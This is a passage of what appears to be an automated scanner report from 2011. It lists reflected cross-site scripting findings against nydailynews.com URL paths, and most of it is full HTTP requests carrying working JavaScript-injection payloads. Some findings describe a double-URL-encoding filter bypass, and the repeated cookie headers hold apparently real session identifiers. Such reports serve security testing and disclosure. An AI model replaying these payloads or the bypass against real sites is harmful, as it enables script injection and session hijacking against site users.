zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:07 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70187
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67f8b'%3balert(1)//679ebae1116 was submitted in the REST URL parameter 4. This input was echoed as 67f8b';alert(1)//679ebae1116 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011/0267f8b'%3balert(1)//679ebae1116/08/2011-02-08_long_island_university_offers_its_first_course_on_raps_history_including_origins.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:18 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70187
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3869d'%3balert(1)//a5d9277aed3 was submitted in the REST URL parameter 5. This input was echoed as 3869d';alert(1)//a5d9277aed3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011/02/083869d'%3balert(1)//a5d9277aed3/2011-02-08_long_island_university_offers_its_first_course_on_raps_history_including_origins.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:31 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70187
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4a65'%3balert(1)//95ed5d9a6e7 was submitted in the REST URL parameter 6. This input was echoed as e4a65';alert(1)//95ed5d9a6e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011/02/08/2011-02-08_long_island_university_offers_its_first_course_on_raps_history_including_origins.htmle4a65'%3balert(1)//95ed5d9a6e7 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:44 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70187
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a744'%3balert(1)//70065f46998 was submitted in the REST URL parameter 1. This input was echoed as 8a744';alert(1)//70065f46998 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local8a744'%3balert(1)//70065f46998/brooklyn/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:37:02 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70090
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb579'%3balert(1)//88f71e0230e was submitted in the REST URL parameter 2. This input was echoed as bb579';alert(1)//88f71e0230e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklynbb579'%3balert(1)//88f71e0230e/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:37:23 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70090
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8747'%3balert(1)//567420c1078 was submitted in the REST URL parameter 3. This input was echoed as d8747';alert(1)//567420c1078 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/index.htmld8747'%3balert(1)//567420c1078 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:38:25 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70090
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee7c6'%3balert(1)//2987d2177ac was submitted in the REST URL parameter 1. This input was echoed as ee7c6';alert(1)//2987d2177ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_localee7c6'%3balert(1)//2987d2177ac/brooklyn/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:39:12 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41796 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 7a7b3%250aalert%25281%2529%252f%252f9dcb7d57f00 was submitted in the REST URL parameter 1. This input was echoed as 7a7b3
alert(1)//9dcb7d57f00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ny_local7a7b3%250aalert%25281%2529%252f%252f9dcb7d57f00/brooklyn/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:39:18 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41709 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea3ae'%3balert(1)//bb45b094113 was submitted in the REST URL parameter 2. This input was echoed as ea3ae';alert(1)//bb45b094113 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklynea3ae'%3balert(1)//bb45b094113/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:41:47 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41697 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 4c2d3%250aalert%25281%2529%252f%252ff0c27e3a86 was submitted in the REST URL parameter 2. This input was echoed as 4c2d3
alert(1)//f0c27e3a86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ny_local/brooklyn4c2d3%250aalert%25281%2529%252f%252ff0c27e3a86/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:41:53 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41663 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1e24'%3balert(1)//6fd136cc065 was submitted in the REST URL parameter 3. This input was echoed as d1e24';alert(1)//6fd136cc065 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/photo_galleriesd1e24'%3balert(1)//6fd136cc065/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:42:02 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70106
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db3c5'%3balert(1)//66097ff38c8 was submitted in the REST URL parameter 4. This input was echoed as db3c5';alert(1)//66097ff38c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/photo_galleries/index.htmldb3c5'%3balert(1)//66097ff38c8 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:42:13 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70106
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 968d0'%3balert(1)//ca88319aebf was submitted in the REST URL parameter 1. This input was echoed as 968d0';alert(1)//ca88319aebf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local968d0'%3balert(1)//ca88319aebf/education/2009_math_scores/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:40:29 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70108
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18846'%3balert(1)//123be6ddee0 was submitted in the REST URL parameter 1. This input was echoed as 18846';alert(1)//123be6ddee0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local18846'%3balert(1)//123be6ddee0/education/2010_scores/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
